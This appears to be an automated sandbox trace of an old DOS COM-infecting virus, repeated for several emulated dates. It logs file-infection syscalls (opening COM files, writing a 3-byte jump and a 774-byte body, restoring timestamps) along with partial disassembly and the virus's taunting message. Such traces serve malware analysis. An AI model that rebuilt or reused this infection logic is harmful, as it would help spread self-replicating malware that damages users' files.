2018-12-25T11:59:10.056867118Z 71 PC: 12b06 | Get current directory
2018-12-25T11:59:10.059956838Z 78 PC: 12b89 | Find first file
2018-12-25T11:59:10.066843352Z 78 PC: 12b89 | Find first file (See above)
2018-12-25T11:59:10.073312131Z 61 PC: 12cce | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:10.080579659Z 63 PC: 12ba4 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:10.088001105Z 62 PC: 12ba8 | Close file
2018-12-25T11:59:10.089936086Z 67 PC: 12cd9 | Get or set file attributes
2018-12-25T11:59:10.11095008Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.118714795Z 64 PC: 12c82 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:10.126026505Z 66 PC: 12cc0 | Move file pointer
2018-12-25T11:59:10.127396262Z 44 PC: 12c8d | Get time 0x12c8d: cmp dh, 0
0x12c90: je 0x12c89
0x12c92: mov byte ptr cs:[bp + 0x408], dh
0x12c97: call 0x12d60
0x12c9a: mov ax, 0x5701
0x12c9d: mov cx, word ptr cs:[bp + 0x47b]
0x12ca2: mov dx, word ptr cs:[bp + 0x47d]
0x12ca7: int 0x21
0x12ca9: mov ah, 0x3e
0x12cab: int 0x21
0x12cad: xor cx, cx
0x12caf: mov cl, byte ptr cs:[bp + 0x47a]
0x12cb4: call 0x12cd0
0x12cb7: ret
0x12cb8: mov ah, 0x42
0x12cba: xor cx, cx
0x12cbc: xor dx, dx
0x12cbe: int 0x21
0x12cc0: ret
0x12cc1: mov ah, 0x1a
2018-12-25T11:59:10.129401312Z 64 PC: 12dbd | Write file or device (Write 774 bytes on handle 5)
2018-12-25T11:59:10.13962165Z 87 PC: 12ca9 | Get or set file date and time
2018-12-25T11:59:10.141571516Z 62 PC: 12cad | Close file
2018-12-25T11:59:10.150100251Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.161442346Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.16450376Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.172782448Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.181094336Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.183652844Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.195336517Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.204312198Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.207560411Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.209148715Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.212657643Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.222486258Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.224687058Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.235345444Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.247204063Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.250725113Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.258771174Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.266755238Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.268787053Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.279872717Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.288122616Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.291306759Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.292893064Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.296496225Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.306327298Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.308034084Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.317411958Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.328654315Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.332087366Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.3406131Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.349080229Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.351275765Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.364043084Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.372663391Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.376337514Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.378786826Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.382859638Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.394130497Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.396442907Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.405744715Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.417035687Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.422293654Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.431494507Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.439112785Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.441411114Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.446870512Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.452615616Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.455978615Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.458541777Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.461945124Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.486147346Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.488725898Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.492237907Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.497493699Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.501033902Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.509542729Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.517044885Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.519490747Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.531538145Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.542741193Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.546927233Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.549503289Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.552772613Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.563617304Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.566238882Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.575052669Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.586484294Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.590703152Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.601340742Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.609143972Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.613820374Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.631400412Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.638952259Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.642200475Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.645028326Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.648233056Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.658152353Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.661079045Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.696278336Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.709663163Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.713146474Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.728862103Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.739279649Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.742253959Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.745361301Z 59 PC: 12b1c | Change current directory
2018-12-25T11:59:10.750038169Z 42 PC: 12b22 | Get date 0x12b22: cmp dl, 0xd
0x12b25: jge 0x12b29
0x12b27: jmp 0x12b2e
0x12b29: mov ax, 0x4c00
0x12b2c: int 0x21
0x12b2e: mov ah, 9
0x12b30: lea dx, word ptr [bp + 0x33c]
0x12b34: int 0x21
0x12b36: mov ax, 0x2524
0x12b39: lds dx, ptr cs:[bp + 0x4a9]
0x12b3e: int 0x21
0x12b40: push cs
0x12b41: pop ds
0x12b42: lea dx, word ptr [bp + 0x425]
0x12b46: mov ah, 0x3b
0x12b48: int 0x21
0x12b4a: mov dx, 0x80
0x12b4d: call 0x12cc1
0x12b50: cmp sp, 0x4448
0x12b54: je 0x12b57
2018-12-25T11:59:10.752689092Z 9 PC: 12b36 | Display string (String= 'I am he, the bornless one, the fallen angel watching you ! (C) Dread Lord. You are the real dead one now ... ')
2018-12-25T11:59:10.764599516Z 37 PC: 12b40 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:10.766340064Z 59 PC: 12b4a | Change current directory
2018-12-25T11:59:10.772704036Z 26 PC: 12cc5 | Set disk transfer address (See above)
2018-12-25T11:59:10.774496292Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6325,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:10.048437679Z 26 PC: 12cc5 | Set disk transfer address
2018-12-25T11:59:10.049654032Z 53 PC: 12ae8 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:10.050684713Z 37 PC: 12afa | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:10.051629049Z 71 PC: 12b06 | Get current directory
2018-12-25T11:59:10.055245363Z 78 PC: 12b89 | Find first file
2018-12-25T11:59:10.060945926Z 78 PC: 12b89 | Find first file (See above)
2018-12-25T11:59:10.066593326Z 61 PC: 12cce | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:10.073217822Z 63 PC: 12ba4 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:10.079259884Z 62 PC: 12ba8 | Close file
2018-12-25T11:59:10.080860678Z 67 PC: 12cd9 | Get or set file attributes
2018-12-25T11:59:10.290315278Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.298579928Z 64 PC: 12c82 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:10.3053648Z 66 PC: 12cc0 | Move file pointer
2018-12-25T11:59:10.307340973Z 44 PC: 12c8d | Get time 0x12c8d: cmp dh, 0
0x12c90: je 0x12c89
0x12c92: mov byte ptr cs:[bp + 0x408], dh
0x12c97: call 0x12d60
0x12c9a: mov ax, 0x5701
0x12c9d: mov cx, word ptr cs:[bp + 0x47b]
0x12ca2: mov dx, word ptr cs:[bp + 0x47d]
0x12ca7: int 0x21
0x12ca9: mov ah, 0x3e
0x12cab: int 0x21
0x12cad: xor cx, cx
0x12caf: mov cl, byte ptr cs:[bp + 0x47a]
0x12cb4: call 0x12cd0
0x12cb7: ret
0x12cb8: mov ah, 0x42
0x12cba: xor cx, cx
0x12cbc: xor dx, dx
0x12cbe: int 0x21
0x12cc0: ret
0x12cc1: mov ah, 0x1a
2018-12-25T11:59:10.309700898Z 64 PC: 12dbd | Write file or device (Write 774 bytes on handle 5)
2018-12-25T11:59:10.318460585Z 87 PC: 12ca9 | Get or set file date and time
2018-12-25T11:59:10.319973323Z 62 PC: 12cad | Close file
2018-12-25T11:59:10.327854027Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.33800605Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.340527552Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.347103085Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.353279717Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.355658981Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.366109829Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.373066319Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.375664892Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.377394619Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.380038403Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.38831984Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.390144783Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.397647199Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.407477843Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.410404771Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.416820761Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.423719836Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.426947949Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.437129218Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.444020837Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.447256604Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.448566058Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.450984651Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.464738511Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.466658627Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.474350817Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.485075098Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.487659484Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.494883602Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.50411919Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.505462397Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.51549215Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.522983453Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.525924272Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.527298699Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.529759228Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.539335179Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.541131145Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.548552432Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.555617949Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.558326158Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.56303146Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.568471262Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.569940371Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.572847644Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.576448564Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.578348166Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.579458478Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.581941991Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.592829405Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.59420848Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.596233482Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.599102302Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.60098654Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.609634924Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.61379364Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.615201144Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.624372447Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.629004507Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.637501173Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.639275863Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.641429583Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.648039992Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.659484939Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.667219791Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.677097815Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.680844715Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.68813516Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.694672537Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.697756973Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.708134772Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.714904344Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.718595003Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.719940301Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.722377423Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.731619018Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.733742253Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.741439556Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.751990383Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.75569782Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.762878598Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.77017031Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.772630603Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.775411601Z 59 PC: 12b1c | Change current directory
2018-12-25T11:59:10.779787547Z 42 PC: 12b22 | Get date 0x12b22: cmp dl, 0xd
0x12b25: jge 0x12b29
0x12b27: jmp 0x12b2e
0x12b29: mov ax, 0x4c00
0x12b2c: int 0x21
0x12b2e: mov ah, 9
0x12b30: lea dx, word ptr [bp + 0x33c]
0x12b34: int 0x21
0x12b36: mov ax, 0x2524
0x12b39: lds dx, ptr cs:[bp + 0x4a9]
0x12b3e: int 0x21
0x12b40: push cs
0x12b41: pop ds
0x12b42: lea dx, word ptr [bp + 0x425]
0x12b46: mov ah, 0x3b
0x12b48: int 0x21
0x12b4a: mov dx, 0x80
0x12b4d: call 0x12cc1
0x12b50: cmp sp, 0x4448
0x12b54: je 0x12b57
2018-12-25T11:59:10.782903502Z 9 PC: 12b36 | Display string (String= 'I am he, the bornless one, the fallen angel watching you ! (C) Dread Lord. You are the real dead one now ... ')
2018-12-25T11:59:10.792316456Z 37 PC: 12b40 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:10.793535114Z 59 PC: 12b4a | Change current directory
2018-12-25T11:59:10.796073203Z 26 PC: 12cc5 | Set disk transfer address (See above)
2018-12-25T11:59:10.797449313Z 9 PC: 12aa2 | Display string (String= 'ABCDE - This is a 100 byte COM test, 1994 ')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":6325,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:10.222022426Z 26 PC: 12cc5 | Set disk transfer address
2018-12-25T11:59:10.223292467Z 53 PC: 12ae8 | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:10.224086246Z 37 PC: 12afa | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:10.224832218Z 71 PC: 12b06 | Get current directory
2018-12-25T11:59:10.228119979Z 78 PC: 12b89 | Find first file
2018-12-25T11:59:10.231689621Z 78 PC: 12b89 | Find first file (See above)
2018-12-25T11:59:10.237374017Z 61 PC: 12cce | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:10.244111379Z 63 PC: 12ba4 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:10.250477846Z 62 PC: 12ba8 | Close file
2018-12-25T11:59:10.252522488Z 67 PC: 12cd9 | Get or set file attributes
2018-12-25T11:59:10.290084999Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.296605568Z 64 PC: 12c82 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:10.29980843Z 66 PC: 12cc0 | Move file pointer
2018-12-25T11:59:10.303031929Z 44 PC: 12c8d | Get time 0x12c8d: cmp dh, 0
0x12c90: je 0x12c89
0x12c92: mov byte ptr cs:[bp + 0x408], dh
0x12c97: call 0x12d60
0x12c9a: mov ax, 0x5701
0x12c9d: mov cx, word ptr cs:[bp + 0x47b]
0x12ca2: mov dx, word ptr cs:[bp + 0x47d]
0x12ca7: int 0x21
0x12ca9: mov ah, 0x3e
0x12cab: int 0x21
0x12cad: xor cx, cx
0x12caf: mov cl, byte ptr cs:[bp + 0x47a]
0x12cb4: call 0x12cd0
0x12cb7: ret
0x12cb8: mov ah, 0x42
0x12cba: xor cx, cx
0x12cbc: xor dx, dx
0x12cbe: int 0x21
0x12cc0: ret
0x12cc1: mov ah, 0x1a
2018-12-25T11:59:10.30695234Z 64 PC: 12dbd | Write file or device (Write 774 bytes on handle 5)
2018-12-25T11:59:10.325841883Z 87 PC: 12ca9 | Get or set file date and time
2018-12-25T11:59:10.328026663Z 62 PC: 12cad | Close file
2018-12-25T11:59:10.332974746Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.339413348Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.342742861Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.347741634Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.352236557Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.354330514Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.361690798Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.371552096Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.393464375Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.394976909Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.397616168Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.406371546Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.408426649Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.416071324Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.425697445Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.428728225Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.435535482Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.442028637Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.445322215Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.455517795Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.462119035Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.465987874Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.467368553Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.469871336Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.479604882Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.481460812Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.494216452Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.504406716Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.507516103Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.514152048Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.522028628Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.52407749Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.534325059Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.54184756Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.544865042Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.546518882Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.55055562Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.559474626Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.561237099Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.5700215Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.580140919Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.582695934Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.594593963Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.602080083Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.604218654Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.608863667Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.614994684Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.617930283Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.619572627Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.623347696Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.637700067Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.640237475Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.643503482Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.647696245Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.650308921Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.658640724Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.665119238Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.667297101Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.696229443Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.702878184Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.705665329Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.707766746Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.710489759Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.72492373Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.727077893Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.741238886Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.751273371Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.754744047Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.761446099Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.767985785Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.770526164Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.780458251Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.78882211Z 64 PC: 12c82 | Write file or device (See above)
2018-12-25T11:59:10.791960402Z 66 PC: 12cc0 | Move file pointer (See above)
2018-12-25T11:59:10.794618625Z 44 PC: 12c8d | Get time (See above)
2018-12-25T11:59:10.797217493Z 64 PC: 12dbd | Write file or device (See above)
2018-12-25T11:59:10.806896834Z 87 PC: 12ca9 | Get or set file date and time (See above)
2018-12-25T11:59:10.808553293Z 62 PC: 12cad | Close file (See above)
2018-12-25T11:59:10.856599376Z 67 PC: 12cd9 | Get or set file attributes (See above)
2018-12-25T11:59:10.866812072Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.869793377Z 61 PC: 12cce | Open file (See above)
2018-12-25T11:59:10.876510648Z 63 PC: 12ba4 | Read file or device (See above)
2018-12-25T11:59:10.883608277Z 62 PC: 12ba8 | Close file (See above)
2018-12-25T11:59:10.885686542Z 79 PC: 12b89 | Find next file (See above)
2018-12-25T11:59:10.888376313Z 59 PC: 12b1c | Change current directory
2018-12-25T11:59:10.893259317Z 42 PC: 12b22 | Get date 0x12b22: cmp dl, 0xd
0x12b25: jge 0x12b29
0x12b27: jmp 0x12b2e
0x12b29: mov ax, 0x4c00
0x12b2c: int 0x21
0x12b2e: mov ah, 9
0x12b30: lea dx, word ptr [bp + 0x33c]
0x12b34: int 0x21
0x12b36: mov ax, 0x2524
